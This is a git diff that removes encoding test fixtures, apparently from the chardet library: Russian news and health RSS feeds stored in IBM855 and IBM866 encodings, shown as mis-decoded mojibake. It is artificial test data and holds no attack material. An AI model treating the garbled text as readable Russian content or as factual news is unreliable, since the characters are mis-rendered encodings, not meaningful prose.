- - - - - - - - ל ׃ײדֶכ¨ כײ כוײבװ·ֶ ¢ח¦¨ו ׂײבײףװײ - http://www.newsru.com/russia/03jan2006/pogoda.html - ל דוײ׀·₪¨ דוײ׀¢·ֶ ו¨בׂײׂ¨וב  װ¨ ײ״חדו·וד װ·י¨ ײוׂ¨וֶ· 1-3 ¬ב ¦חד  ׂײבײף ,   ״ײ ײ¢׀ דו· - 1-6 ¬ב ¦חדײכ. ל¨ו¨ב ¢ח¦¨ו ¬ײ-כײדוײװסׂ, חׂ¨ב¨װװסׂ · װ¨ ״ב¨כסד·ו 3-8 ׂ¨ובײכ כ ד¨ֶחװ¦ח. - ל גײדד·· - Tue, 3 Jan 2006 09:15:00 +0300 - - - - - diff --git a/chardet/tests/IBM855/susu.ac.ru.xml b/chardet/tests/IBM855/susu.ac.ru.xml deleted file mode 100644 index 5661d9e..0000000 --- a/chardet/tests/IBM855/susu.ac.ru.xml +++ /dev/null @@ -1,32 +0,0 @@ - - - - -ru -press@susu.ac.ru (¥¨װוב ·װ×ײבׂ ₪·· · דכף¨½ ד ײ¢ש¨דוכ¨װװײדום) -webmaster@urc.ac.ru (׳ו¦¨׀ ¬׀ײ¢ ׀םװסµ ד¨ו¨כסµ ו¨µװײ׀ײ¬·½) -http://susu.ac.ru/gerb2.gif -יװײ-טב ׀םדֶ·½ ¬ײדח¦ בדוכ¨װװס½ חװ·כ¨בד·ו¨ו -http://susu.ac.ru/ -ױײכײדו· טב­ט -http://susu.ac.ru/ru/news/ -ױײכײדו· יװײ-טב ׀םדֶײ¬ײ ¬ײדח¦ בדוכ¨װװײ¬ײ חװ·כ¨בד·ו¨ו  (¨׀¢·װדֶ) -~220 V, 50 Hz -1995-2004 יװײ-טב ׀םדֶ·½ ¬ײדח¦ בדוכ¨װװס½ חװ·כ¨בד·ו¨ו -Thu, 10 Mar 2005 15:45:45 +0500 - -Thu, 29 Dec 2005 00:00:00 +0500 -http://susu.ac.ru/ru/news/1329 -ױ ¬ב י¦¨װס ״ײ¢¨¦·ו¨׀· ֶײװֶחבד  ד ½וײכ -29 ¦¨ֶ ¢ב כ ף ׀¨ ף ד¨¦ װ·½ ט„װײ¬ײ דײכ¨ו  יװײ-טב ׀םדֶײ¬ײ ¬ײדח¦ בדוכ¨װװײ¬ײ דײכ¨ו  דײדוײ׀ דם ₪¨ב¨ׂײװ· װ ¬ב י¦¨װ· ״ײ¢¨¦·ו¨׀¨½ ֶײװֶחבד  ד ½וײכ ָל¨¢-דובײ·ו¨׀םדוכײ. ה¦¨׀ ½ ד ׂ. - -ל ֶײװֶחבד¨ ״ב·װ׀· ח דו·¨ ײֶײ׀ײ 70 ד ½וײכ, דײף¦ װװסµ דוח¦¨װו ׂ·, ״ב¨״ײ¦ כ ו¨׀ׂ·... -29 ¦¨ֶ ¢ב כ ף ׀¨ ף ד¨¦ װ·½ ט„װײ¬ײ דײכ¨ו  יװײ-טב ׀םדֶײ¬ײ ¬ײדח¦ בדוכ¨װװײ¬ײ דײכ¨ו  דײדוײ׀ דם ₪¨ב¨ׂײװ· װ ¬ב י¦¨װ· ״ײ¢¨¦·ו¨׀¨½ <a href=""http://konkurs.susu.ru/"">ֶײװֶחבד  ד ½וײכ ָל¨¢-דובײ·ו¨׀םדוכײ. ה¦¨׀ ½ ד ׂ</a>. - -ל ֶײװֶחבד¨ ״ב·װ׀· ח דו·¨ ײֶײ׀ײ 70 ד ½וײכ, דײף¦ װװסµ דוח¦¨װו ׂ·, ״ב¨״ײ¦ כ ו¨׀ׂ· · דײובח¦װ·ֶ ׂ· טב­ט. - -ב¨¦ד¨¦ ו¨׀ם יב·, ״בײב¨ֶוײב ״ײ ח¨¢װײ½ ב ¢ײו¨ ¡׀¨ֶד װ¦ב ¸כ װײכ· ה·¦ײבײכ כבח·׀ װ ¬ב ¦ס ״ײ¢¨¦·ו¨׀ׂ: -<ul><li>ט¨¢װס¨ ד ½וס<ol><li><a href=""http://www.tipilp.susu.ac.ru/"">ַ ×¨¦ב  ז¨µװײ׀ײ¬·· · ״בײ¨ֶו·בײכ װ· ·ף¦¨׀·½ ׀„¬ֶײ½ ״בײׂסץ׀¨װװײדו·</a></li><li><a href=""http://model.exponenta.ru/"">Model.Exponenta.Ru \ No newline at end of file diff --git a/chardet/tests/IBM866/aif.ru.health.xml b/chardet/tests/IBM866/aif.ru.health.xml deleted file mode 100644 index 6beda09..0000000 --- a/chardet/tests/IBM866/aif.ru.health.xml +++ /dev/null @@ -1,131 +0,0 @@ - - - - - - www.AIF.ru - ˆ­ג¥א­¥ג-¢¥אב¨ן ¨§₪ ­¨ן "€¨” ‡₪®א®¢ל¥" - http://www.aif.ru/online/health - - - €¨” ‡₪®א®¢ל¥ - http://www.aif.ru/data/mags/health/button.gif - http://www.aif.ru/online/health - 88 - 31 - - - -  × ¯¥א¥¦¨גל ­®¢®£®₪­ממ ­®חל - http://www.aif.ru/online/health/592/11_01 - -  ¢¥א­®¥, ¥₪¨­בג¢¥­­®¥, ¢® חג® ב¥£®₪­ן ¬®¦­® ¢¥א¨גל ¡¥§®£®¢®א®ח­®, ג × םג® ¢ ג®, חג® ®¢כ© £®₪ ®¡ן§ ג¥«ל­® ­ בגד¯¨ג. ¥ב¬®גאן ­¨ ­  חג®! ג® ­¥ ¯א®בג® ®ח¥א¥₪­®© ¯א §₪­¨×, םג® - ¢¥ו ! € ¢¥ו¨ ¢ ¦¨§­¨ ¯א¨­ןג® ®ג¬¥ח גל. ג¬¥ח גל ט¨א®×® ¨ ₪¥­ל×  ם₪ × ₪¢ -גא¨... ˆ ¢¬¥בג® ¯א®¢®§£« ט ¥¬כו "­®¢®£® בח בגלן" ¨ "­®¢®£® §₪®א®¢לן" ¯א §₪­®¢ ­¨¥ ®¢®£® £®₪  ¯א¨­®ב¨ג «¨¡® ­®¢כ¥ ¡®«ןחר, «¨¡® ®¡®בגאן¥ג בג אכ¥. „ ¡כ ¯®בג א גלבן ¨§¡¥¦ גל ¯®₪®¡­®£® ה¨­ «  «מ¡¨¬®£® ¯א §₪­¨× , ¯א¨¢¥₪ד ­¥ב×®«ל×® "¯א §₪­¨ח­כו" ¯א ¢¨« § בג®«ל­®© ¡¥§®¯ ב­®בג¨. - - - ˆ₪¨ג¥ ¢ ¡ ­מ! - http://www.aif.ru/online/health/592/03_01 - - ג® ¬®¦­® ₪¥« גל ¢ ®¯¨«× ו, ¢ ¬¥ט×¥ ב ¡¥א¥§®¢כ¬¨ «¨בגלן¬¨ ¨«¨ ב¥­®¬.  א¨גלבן ¬®¦­®, ₪ ¦¥ § אכ¢ט¨בל ¢ ¯¥ב®×.  × ¯א ¢¨«ל­® ו®₪¨גל ¢ ¡ ­מ, ­ ¬ א בב× §כ¢ ¥ג ¢א ח-ה¨§¨®ג¥א ¯¥¢ג ®ג₪¥«¥­¨ן ¡ «ל­¥®«®£¨¨ ¬¥₪¨ז¨­ב×®£® ז¥­גא  "ƒדג -«¨­¨×" «¨ן €’€‚€. - - - ח¥¬ א בב× ¦¥ג א¥ ×ז¨ן ¬ ­גד - http://www.aif.ru/online/health/592/05_01 - - ¥ ×ז¨ן  ­גד - םג® גד¡¥א×ד«¨­®¢ ן ¯א®¡ . „«ן × ×®© ז¥«¨ ®­  ¨§­ ח «ל­® ¯א¥₪­ §­ ח « בל? "¥ ×ז¨ן  ­גד - םג® ®ג¢¥ג ׫¥ג®ח­®£® ¨¬¬ד­¨ג¥ג  × × £¨¯¥אחד¢בג¢¨ג¥«ל­®בג¨ § ¬¥₪«¥­­®£® ג¨¯  ­  ב¥­ב¨¡¨«¨§ ז¨מ ®א£ ­¨§¬  ¬¨×®¡ ×ג¥א¨ן¬¨ גד¡¥א×ד«¥§ . א¥₪­ §­ ח¥­  ®­  ₪«ן ¢כן¢«¥­¨ן ¢ ®א£ ­¨§¬¥ ¢®§¡ד₪¨ג¥«ן גד¡¥א×ד«¥§ ". (®¬¨ג¥ג ¯® ׫¥ג®ח­®¬ד ¨¬¬ד­¨ג¥גד ¨ דבג®©ח¨¢®בג¨ × ¨­ה¥×ז¨¨, ‚‡, 1965, 1970 ££.) ¥א¢ ן ¢בגא¥ח  ב ¬¨×®¡ ×ג¥א¨ן¬¨ גד¡¥א×ד«¥§  ¢ ®בב¨¨ ­ ¢ן§כ¢ ¥גבן ¨ב×דבבג¢¥­­® (!) ¨ ¬ בב®¢® ¢ א®₪₪®¬ ו. - - - ‘ 3 ₪® 7 «¥ג.  בג¨¬ ט¥¢¥«מאד - http://www.aif.ru/online/health/592/06_01 - - "®¥© ₪¥¢®ח×¥ ב×®א® 5 «¥ג. …© ד¦¥ ¡ ­ג¨×¨ ­®ב¨גל ו®ח¥גבן, ­® ו¢®בג¨×¨ ₪¥« גל ­¥ ¨§ ח¥£®. ®₪ב× ¦¨ג¥, ¢ ח¥¬ ¬®¦¥ג ¡כגל ¯א¨ח¨­  ¨ נר¥ בא¥₪בג¢  ¬®£דג ¯®¬®חל?" -. ¥ ח ­ ¨ × ® ¢  , ®בגא®¬  - - - ‘ 7 ₪® 12 «¥ג. •®«®₪¨«ל­¨× ­  ׫מח - http://www.aif.ru/online/health/592/06_02 - - "®¦­® «¨ ®¯א¥₪¥«¨גל, ¨בג¨­­®¥ ד א¥¡¥­×  ®¦¨א¥­¨¥ ¨«¨ ®­ ¯¥א¥¥₪ ¥ג?" -’. € ¢ ¥ א ¨ ­  , …× ג¥א¨­¡דא£ - - - ‘ 12 ₪® 16 «¥ג. ¯ ב­ ן ¬®₪  - http://www.aif.ru/online/health/592/06_03 - - "‘× ¦¨ג¥, ­ ב×®«ל×® ®¯ ב­® ו®₪¨גל §¨¬®© ב ®ג×אכגכ¬ ¦¨¢®ג®¬. ®ן ₪®חל £®¢®א¨ג, חג® ®­  ¢ב¥ ¯א¨×אכ¢ ¥ג ×דאג×®©, ­® ¢ב¥ א ¢­® ¦¥ ו®«®₪­®... „®× § גל ¥© חג®-«¨¡® ­¥¢®§¬®¦­®." -‚. ., ’®«לןגג¨ - - - א ¢¨«  ₪«ן ¦¥«ד₪×  - http://www.aif.ru/online/health/592/07_01 - - ­®£¨¥ ¯¥א¨®₪¨ח¥בר בגא ₪ מג ®ג ­¥ב¢ א¥­¨ן ¦¥«ד₪× , ב®¯א®¢®¦₪ מי¥£®בן ¡®«¥¢כ¬¨ ®ידי¥­¨ן¬¨. א¨ח¨­  םג®£® § ×«מח ¥גבן ­¥ ג®«ל×® ¢ ג®¬, חג® «מ₪¨ ¥₪ןג ­¥ ג®, חג® ­ ₪®, ­® ¨ ­¥ ג ×, × × ­ ₪®, ¨ ¡®«לט¥, ח¥¬ ­ ₪®. ב®¡¥­­® ח בג® ג × ן ¯א®¡«¥¬  ¢®§­¨× ¥ג ¯®ב«¥ ¯א §₪­¨ח­כו § בג®«¨©. —ג®¡כ ­¥ ₪®¢®₪¨גל ¦¥«ד₪®× ₪® ג ×®£® ב®בג®ן­¨ן, ¯®¬­¨ג¥ ­¥ב×®«ל×® ¯א®¢¥א¥­­כו ¢א¥¬¥­¥¬ ¯א ¢¨«. - - -  בגד¯«¥­¨¥ ­   ­£¨­ד - http://www.aif.ru/online/health/592/08_01 - - ®₪­®¬ד ¨§ ­ ¨¡®«¥¥ א ב¯א®בגא ­¥­­כו ¯א®בגד₪­כו § ¡®«¥¢ ­¨© ®ג­®ב¨גבן  ­£¨­ , ¨«¨ ®בגאכ© ג®­§¨««¨ג. ג®¬ד ®בגא®¬ד ¨­ה¥×ז¨®­­®¬ד § ¡®«¥¢ ­¨מ ב ¯®א ¦¥­¨¥¬ ¬¨­₪ «¨­ (£« ­₪) ¯®₪¢¥א¦¥­כ × × ₪¥ג¨, ג × ¨ ¢§א®ב«כ¥. — י¥ ¢ב¥£®  ­£¨­  ¢®§­¨× ¥ג ¨§-§  ¯¥א¥®ו« ¦₪¥­¨ן ג¥«  ¨«¨ ®ג₪¥«ל­כו ¥£® ח בג¥©, ®ב®¡¥­­® ­®£, ­  ה®­¥ ב­¨¦¥­¨ן ¨¬¬ד­­®© § י¨גכ ®א£ ­¨§¬ , ¯א¨ ­¥× «®א¨©­®¬ ¯¨ג ­¨¨, וא®­¨ח¥ב×®¬ בגא¥בב¥, ¯¥א¥דג®¬«¥­¨¨, ­¥₪®בכ¯ ­¨¨. - - - ‚­¨¬ ­¨¥ ­  ¯®§¢®­®ח­¨× - http://www.aif.ru/online/health/592/10_01 - - בג¥®ו®­₪א®§ - ₪®¢®«ל­® א ב¯א®בגא ­¥­­®¥ § ¡®«¥¢ ­¨¥, ×®ג®א®¥ א §¢¨¢ ¥גבן ד «מ₪¥© «מ¡®£® ¢®§א בג . א¨ח¥¬ ¢ ¯®ב«¥₪­¥¥ ¢א¥¬ן ¢ ב¢ן§¨ ב ¬ «®¯®₪¢¨¦­כ¬ ®¡א §®¬ ¦¨§­¨ ¨ ¬­®£®ח ב®¢כ¬ ב¨₪¥­¨¥¬ §  ×®¬¯למג¥א®¬ ®­ § ¬¥ג­® ¯®¬®«®₪¥«.  × ¯®× § «¨ ¨בב«¥₪®¢ ­¨ן, ¯א®¢¥₪¥­­כ¥ ¢ ˆ­בג¨גדג¥ ­ גדא®¯ ג¨¨, ¢ ¯א®ה¨« ×ג¨×¥ ®בג¥®ו®­₪א®§  ­ ¨¡®«לט¨© םהה¥×ג ®× §כ¢ מג ¬ בב ¦, «¥ח¥¡­ ן £¨¬­ בג¨× , ב ¬®¢כגן¦¥­¨¥ ט¥¨ ¨ ¯®§¢®­®ח­¨× , ₪¨¥ג  ¨ ה¨ג®ג¥א ¯¨ן. - - - ¥ ב«¨ט×®¬ «¨ ¦¨א­®? - http://www.aif.ru/online/health/592/11_02 - - ‚כ¡¨א ן ­ ¨¡®«¥¥ ¯®₪ו®₪ןי¨¥ ₪«ן ¢ ב ¢ א¨ ­גכ ®ג¢¥ג®¢ ­  × ¦₪כ© ¨§ ¢®¯א®ב®¢ םג®£® ג¥בג , ¢כ ב¬®¦¥ג¥ ¢ ₪®בג ג®ח­®© בג¥¯¥­¨ ®¡ך¥×ג¨¢­® ®¯א¥₪¥«¨גל -   ­¥ "¯¥א¥¡ אי¨¢ ¥ג¥" «¨ ¢כ ¢ ב¢®¥¬ ¯¨י¥¢®¬ א ז¨®­¥ ב ¦¨א ¬¨? - - - ˆ§«¥ח¨¬ «¨  «×®£®«¨§¬? - http://www.aif.ru/online/health/592/12_01 - - " × ¨ ₪«ן ח¥£® «מ₪¨ ב®§₪ מג ב¥¡¥ ¡®«¥§­¨ ¨ ¯א®¡«¥¬כ?  × ¯®¬®חל «מ₪ן¬ ¨§¬¥­¨גל ב¢®מ ¦¨§­ל? ˆ × × ב₪¥« גל ¦¨§­ל ח¥«®¢¥×  §₪®א®¢®©, ב¨«ל­®© ¨ בח בג«¨¢®©?" א ×ג¨×דמי¨© ¯ב¨ו®ג¥א ¯¥¢ג, ¯ב¨ו®«®£ ¨ £®¬¥®¯ ג ‚ «¥א¨© ‘ˆ…‹ˆ‚ ¯כג ¥גבן ­ ©ג¨ ®ג¢¥גכ ­  םג¨ ¢®¯א®בכ... ‘¥£®₪­ן ¬כ ¯ד¡«¨×ד¥¬ £« ¢ד ¨§ ×­¨£¨ "’ ©­כ ¯®₪ב®§­ ­¨ן", ¢ ×®ג®א®© ₪®×ג®א ‘¨­¥«ל­¨×®¢ ¯®¬®£ ¥ג ¯®­ןגל ¯א¨ח¨­כ ג ×®© ¡¥₪כ, × ×  «×®£®«¨§¬, ¨ ¯®× §כ¢ ¥ג ¯דגל ¨§¡ ¢«¥­¨ן ®ג םג®© ¡®«¥§­¨. - - - „¨¥ג®«®£¨ן ¢ ¢®¯א®ב ו ¨ ®ג¢¥ג ו - http://www.aif.ru/online/health/592/14_01 - - ‘¥£®₪­ן ­  ¢®¯א®בכ ח¨ג ג¥«¥© ®ג¢¥ח ¥ג ¢א ח-₪¨¥ג®«®£, ₪®×ג®א ¬¥₪¨ז¨­ברו ­ ד× ¨ו ¨« ƒˆ‡“ƒ. - - - ‡ × «ן¥¬ £®א«® - http://www.aif.ru/online/health/592/15_01 - - ‚ <a href="http://www.aif.ru/online/health/591/04_01">¯א¥₪כ₪די¥¬ ­®¬¥א¥</a> ¬כ א בב× § «¨ ® ג®¬, × × ¯®¢כב¨גל דבג®©ח¨¢®בגל × ו®«®₪ד ¢®§₪דו®¯א®¢®₪ןי¨ו ¯דג¥© ­®ב , × × ­ד¦­® ¯א ¢¨«ל­® ₪כט גל ­  ¬®א®§¥. € ג¥¯¥אל - ­¥ב×®«ל×® ב®¢¥ג®¢, × × § × «¨גל £®א«®. - - - ‘­¨¬ ¥¬ דג®¬«¥­¨¥ - http://www.aif.ru/online/health/592/16_02 - - "¥­ן ®ח¥­ל דג®¬«ןמג ­¥ ג®«ל×® ₪«¨ג¥«ל­כ¥ ¯®¥§₪ר ¢  ¢ג®¬®¡¨«¥, ­® ¨ ₪®«£¨¥ ב¨₪¥­¨ן ­  א §«¨ח­®£® א®₪  ב®¢¥י ­¨ןו ¨ ב®¡א ­¨ןו. ˆ ¥י¥ ¡¥ב¯®×®¨ג ®¡י¥¥ ¨ ­¥א¢­®¥ ­ ¯אן¦¥­¨¥,   ¢ ¯®ב«¥₪­¥¥ ¢א¥¬ן - ₪ ¦¥ £®«®¢­כ¥ ¡®«¨. —ג® ¬­¥ ¬®¦¥ג ¯®¬®חל?" -ˆ£®אל ‘ ® ¬ ® ¢, ®ב×¢  - - - ‚§₪ד«בן ¦¨¢®ג - http://www.aif.ru/online/health/592/16_04 - - "—ג® ¯®¬®¦¥ג ¯א¨ ¢§₪דג¨¨ ¦¨¢®ג ? —¥¬ ­ ₪® ¯¨ג גלבן?" -…× ג¥א¨­  ., א¥« - - - ®¦­® «¨ ¯¥א¥¥בגל ¢¨ג ¬¨­®¢? - http://www.aif.ru/online/health/592/16_06 - - "ב¥­למ ¨ §¨¬®© א¥×®¬¥­₪דמג ¯¨גל ¡®«לט¥ ¢¨ג ¬¨­®¢. ‘× ¦¨ג¥,   × ח¥¬ד ¬®¦¥ג ¯א¨¢¥בג¨ ¨ו ¯¥א¥¨§¡כג®×?" -‚. ‚ ¥ « ¨ × ® ¢, ”אן§¥¢® - - -  ¡®ג  ­ ₪ ®¡א §®¬ - http://www.aif.ru/online/health/592/10_02 - -  ¢¥א­®¥, ­¥ג ג ×®© ¦¥­י¨­כ, ×®ג®א ן ­¥ ו®ג¥«  ¡כ ו®א®ט® ¢כ£«ן₪¥גל. ב®¡¥­­® ו®ח¥גבן ¯®א ¡®ג גל ­ ₪ ב¢®¨¬ ®¡א §®¬ ¯¥א¥₪ ¯א §₪­¨×®¬.  בג®ןי¥© ¯ «®ח×®©-¢כאדח «®ח×®© בג ­דג ¬ בר ¨§ ­ גדא «ל­כו ¯א®₪ד×ג®¢. - - - - diff --git a/chardet/tests/IBM866/aug32.hole.ru.xml b/chardet/tests/IBM866/aug32.hole.ru.xml deleted file mode 100644 index 73e8c35..0000000 --- a/chardet/tests/IBM866/aug32.hole.ru.xml +++ /dev/null @@ -1,18 +0,0 @@ - - - - - €ה¨ט  ’€ "32-¥ €¢£דבג " - http://aug32.hole.ru/ - €ה¨ט  ’€ "32-¥ €¢£דבג " - - - 18.01.06 - <b>„…”…’› …—ˆ</b>. ‘®«ל­כ© ×®­ז¥אג.<BR><I>‘ ­×ג ¥ג¥א¡דא£. ®­ז¥אג­כ© § « ×­¨¦­®£® ¬ £ §¨­  "ד×¢®¥₪".   ¯«. ‚®בבג ­¨ן.</I> - http://aug32.hole.ru/afisha.htm - - - diff --git a/chardet/tests/IBM866/aviaport.ru.xml b/chardet/tests/IBM866/aviaport.ru.xml deleted file mode 100644 index e1999f4..0000000 --- a/chardet/tests/IBM866/aviaport.ru.xml +++ /dev/null @@ -1,149 +0,0 @@ - - - - - - €¢¨ ®אג.Ru - http://www.aviaport.ru - €¢¨ ז¨ן ¨ו ¯¥א¢כו אד× - - http://www.aviaport.ru/images/aviaport_logo_yandex.gif - €¢¨ ®אג.Ru - http://www.aviaport.ru - - - -  ©₪¥­כ ג¥«  ₪¢דו ¯®£¨¡ט¨ו ¢  ¢¨ × ג בגא®ה¥ ¯®₪ • אל×®¢®¬ - http://www.aviaport.ru/news/2006/01/02/99278.html -   ג¥אא¨ג®א¨¨ “×א ¨­כ א §¡¨«בן ב ¬®«¥ג ב גא¥¬ן ח«¥­ ¬¨ םר¯ ¦ , ¢כ«¥ג¥¢ט¨© ¨§ ®ב×¢כ. ’¥«  ₪¢דו ¯®£¨¡ט¨ו ¯®₪­ןגכ ¨§ ®§¥א  ®¬ב®¬®«לב×®¥, ×ד₪  ד¯ « ב ¬®«¥ג - Mon, 02 Jan 2006 17:25:00 +0300 -   ג¥אא¨ג®א¨¨ “×א ¨­כ א §¡¨«בן ב ¬®«¥ג ב גא¥¬ן ח«¥­ ¬¨ םר¯ ¦ , ¢כ«¥ג¥¢ט¨© ¨§ ®ב×¢כ. ’¥«  ₪¢דו ¯®£¨¡ט¨ו ¯®₪­ןגכ ¨§ ®§¥א  ®¬ב®¬®«לב×®¥, ×ד₪  ד¯ « ב ¬®«¥ג.  × ב®®¡י ¥ג ×®אא¥ב¯®­₪¥­ג  £¥­גבג¢  "ˆ­ג¥אה ×ב-“×א ¨­ ", ¯® ¯א¥₪¢ א¨ג¥«ל­כ¬ ₪ ­­כ¬, םג® ג¥«  בגמ א₪¥בבכ ¨ ®₪­®£® ¨§ ¯¨«®ג®¢. „«ן ¯®₪ך¥¬  ב ¬®«¥ג  ®¦¨₪ מג ¯א¨¡כג¨¥ א®בב¨©ברו ב¯¥ז¨ «¨בג®¢.  × ב®®¡י¨«¨ "ˆ­ג¥אה ×בד" ¢ ¯א¥בב-ב«ד¦¡¥ —‘ ”, ¢ ¯®­¥₪¥«ל­¨× ¢ 11:16 ‘ א¥ ×ג¨¢­כ© ב ¬®«¥ג ¡¨§­¥ב ׫ בב   ¥-125, ¢כ«¥ג¥¢ט¨© ¨§ "˜¥א¥¬¥גל¥¢®-1", ד¯ « ¢ 3-4 ר«®¬¥גא ו ­¥₪ «¥×® ®ג  םא®¯®אג  • אל×®¢ . ‚ —‘ ₪®¡ ¢¨«¨, חג® ח«¥­כ םר¯ ¦  - £א ¦₪ ­¥ ®בב¨¨. ‘ ¬®«¥ג § א¥£¨בגא¨א®¢ ­ ¢ ®בגא®¢­®¬ £®בד₪ אבג¢¥ €אד¡ . ˆ§ • אל×®¢  ®­ ₪®«¦¥­ ¡כ« ₪®בג ¢¨גל גדא¨בג®¢ ¢ €«ל¯כ. ¯®¨ב×®¢כ¬ א ¡®ג ¬ ¯א¨¢«¥ח¥­כ ­ §¥¬­ ן ¯®¨ב×®¢ ן £אד¯¯   םא®¯®אג  "• אל×®¢", ¯®₪א §₪¥«¥­¨¥ ®¯¥א ג¨¢­®-ב¯ ב ג¥«ל­®© ב«ד¦¡כ ƒ“ ¨­—‘ ¢ • אל×®¢ב×®© ®¡« בג¨, ¢®₪®« §כ. ®®א₪¨­ ז¨מ ¯®¨ב×®¢®-ב¯ ב ג¥«ל­כו א ¡®ג ב®¢¥אט ¥ג • אל×®¢בר© א¥£¨®­ «ל­כ© ×®®א₪¨­ ז¨®­­כ© ז¥­גא ƒ®בד₪ אבג¢¥­­®©  ¢¨ ז¨®­­®© ¯®¨ב×®¢®-ב¯ ב ג¥«ל­®© ב«ד¦¡כ ¨­—‘ “×א ¨­כ. - - - - - ®ג®× ¯ בב ¦¨א®¢ ח¥א¥§  םא®¯®אג ¨¬¥­¨ ¥­-ƒדא¨®­  ¢כא®ב ­  11% - http://www.aviaport.ru/news/2006/01/02/99277.html - ‚ 2005-¬ £®₪ד ח¥א¥§  םא®¯®אג ¨¬¥­¨ ¥­-ƒדא¨®­  ¯א®ט«¨ ¯א¨¬¥א­® 8,7 ¬¨««¨®­®¢ ¯ בב ¦¨א®¢ ¬¥¦₪ד­ א®₪­כו ¨ ­ ז¨®­ «ל­כו  ¢¨ «¨­¨©. א¨א®בג ¯® בא ¢­¥­¨מ ב 2004 £®₪®¬ ב®בג ¢¨« ®×®«® 11% - Mon, 02 Jan 2006 13:29:00 +0300 - ‚ ב¥£®₪­ןט­¥¬ ­®¬¥א¥ The Marker (ם×®­®¬¨ח¥ב×®¥ ¯א¨«®¦¥­¨¥ × £ §¥ג¥ "ƒ  א¥ז") ¡כ«¨ ®¯ד¡«¨×®¢ ­כ ₪ ­­כ¥ ® א®בג¥ ¯®ג®×  ¯ בב ¦¨א®¢ ח¥א¥§  םא®¯®אג ¨¬¥­¨ „ ¢¨₪  ¥­-ƒדא¨®­ .‘®£« ב­® ב¢¥₪¥­¨ן¬, ¯א¥₪®בג ¢«¥­­כ¬  ₪¬¨­¨בגא ז¨¥©  םא®¯®אג , ¢ 2005-¬ £®₪ד ח¥א¥§  םא®¯®אג ¨¬¥­¨ ¥­-ƒדא¨®­  ¯א®ט«¨ ¯א¨¬¥א­® 8,7 ¬¨««¨®­®¢ ¯ בב ¦¨א®¢ ¬¥¦₪ד­ א®₪­כו ¨ ­ ז¨®­ «ל­כו  ¢¨ «¨­¨©. א¨א®בג ¯® בא ¢­¥­¨מ ב 2004 £®₪®¬ ב®בג ¢¨« ®×®«® 11%. א¨א®בג ­  ¬¥¦₪ד­ א®₪­כו  ¢¨ «¨­¨ןו ב®בג ¢¨« ¯א¨¬¥א­® 5,3% ¯® בא ¢­¥­¨מ ב ¯א®ט«כ¬ £®₪®¬.The Marker ¯ד¡«¨×ד¥ג ₪ ­­כ¥ §  גא¨ ­¥₪¥«¨ ¨§ ¦¨§­¨  םא®¯®אג : 1-21 ₪¥× ¡אן  םא®¯®אג ¯א¨­ן« ¯א¨¬¥א­® 360,7 גכבןח ¯ בב ¦¨א®¢, חג® ­  1,4% ¢כט¥ ¯א®ט«®£®₪­¥£® ¯®× § ג¥«ן §   ­ «®£¨ח­כ© ¯¥א¨®₪. —¨ב«® ¯א¨¡כ¢ט¨ו ¯ בב ¦¨א®¢ ¬¥¦₪ד­ א®₪­כו  ¢¨ «¨­¨© ב®בג ¢¨«® ¯א¨¬¥א­® 176 גכבןח (¯א¨א®בג ­  0,7%), ח¨ב«® ¢כ«¥ג¥¢ט¨ו ¯ בב ¦¨א®¢ ב®בג ¢¨«® 164,5 גכבןח (¯א¨א®בג ­  2,2%).—ג® × ב ¥גבן ¢­דגא¥­­¨ו  ¢¨ «¨­¨©, 1-21 ₪¥× ¡אן ח¥א¥§  םא®¯®אג ¨¬¥­¨ ¥­-ƒדא¨®­  ¯א®ט«¨ ¯א¨¬¥א­® 20,1 גכבןח ¯ בב ¦¨א®¢, חג® ­  1,7% ¢כט¥  ­ «®£¨ח­®£® ¯®× § ג¥«ן ¢ ¯א¥₪כ₪די¥¬ £®₪ד. „¢¨¦¥­¨¥ ב ¬®«¥ג®¢ ­  ¢­דגא¥­­¨ו  ¢¨ «¨­¨ןו ב®בג ¢¨«® 428 ¢§«¥ג®¢ ¨ ¯®ב ₪®× (¯א¨א®בג ¢ א §¬¥א¥ 3,6%). - - - - - „«ן גדט¥­¨ן ¯®¦ א®¢ ¢ ‘˜€ ¯א¨¢«¥ח¥­כ ¢¥אג®«¥גכ  ז¨®­ «ל­®© £¢ א₪¨¨ - http://www.aviaport.ru/news/2006/01/02/99276.html - ‚ אן₪¥ טג ג®¢ ‘˜€ ¡דטדמג «¥ב­כ¥ ¯®¦ אכ. „«ן «¨×¢¨₪ ז¨¨ ¯®¦ א®¢ § ₪¥©בג¢דמגבן ¢¥אג®«¥גכ  ז¨®­ «ל­®© £¢ א₪¨¨ טג ג  ’¥ו ב - Mon, 02 Jan 2006 13:28:00 +0300 - ‚ אן₪¥ טג ג®¢ ‘˜€ ¡דטדמג «¥ב­כ¥ ¯®¦ אכ, ב®®¡י¨«¨ ¯א¥₪בג ¢¨ג¥«¨ ¯®¦ א­®© ב«ד¦¡כ בגא ­כ. ’ ×, ®ח £¨ ¢®§£®א ­¨© § א¥£¨בגא¨א®¢ ­כ ¢ טג ג ו ׫ ו®¬ , ’¥ו ב ¨ למ-¥×ב¨×®. א¨ םג®¬ ¯«®י ₪ל ®ג₪¥«ל­כו ¯®¦ א®¢ ­  £א ­¨ז¥ ’¥ו ב ¨ למ-¥×ב¨×® ₪®בג¨£ ¥ג 20 גכב. £ . „«ן «¨×¢¨₪ ז¨¨ ¯®¦ א®¢ § ₪¥©בג¢דמגבן ¢¥אג®«¥גכ  ז¨®­ «ל­®© £¢ א₪¨¨ טג ג  ’¥ו ב. ב­®¢­כ¬¨ ¯א¨ח¨­ ¬¨ «¥ב­כו ¯®¦ א®¢, ¯א®₪®«¦ מי¨ובן ב ×®­ז  ₪¥× ¡אן 2005 £. ¢ אן₪¥ מ£®-§ ¯ ₪­כו א ©®­ ו ‘˜€, ן¢«ןמגבן § בדו ,  ­®¬ «ל­® ¢כב®× ן ₪«ן םג®£® ¢א¥¬¥­¨ £®₪  ג¥¬¯¥א גדא  ¢®§₪דו  ¨ ב¨«ל­כ© ¢¥ג¥א, ¯¥א¥₪ ¥ג €. - - - - -   ¡®אגד הא ­זד§ב×®£® ב ¬®«¥ג  ¦¥­י¨­  א®₪¨«  א¥¡¥­×  - http://www.aviaport.ru/news/2006/01/02/99275.html -   ¡®אגד ¯ בב ¦¨אב×®£® ב ¬®«¥ג   ¢¨ ×®¬¯ ­¨¨ Air Austral, «¥ג¥¢ט¥£® ¨§ ”א ­ז¨¨ ­  ®בגא®¢ ¥מ­ל®­, ¦¥­י¨­  א®₪¨«  א¥¡¥­×  - Mon, 02 Jan 2006 13:25:00 +0300 -   ¡®אגד ¯ בב ¦¨אב×®£® ב ¬®«¥ג   ¢¨ ×®¬¯ ­¨¨ Air 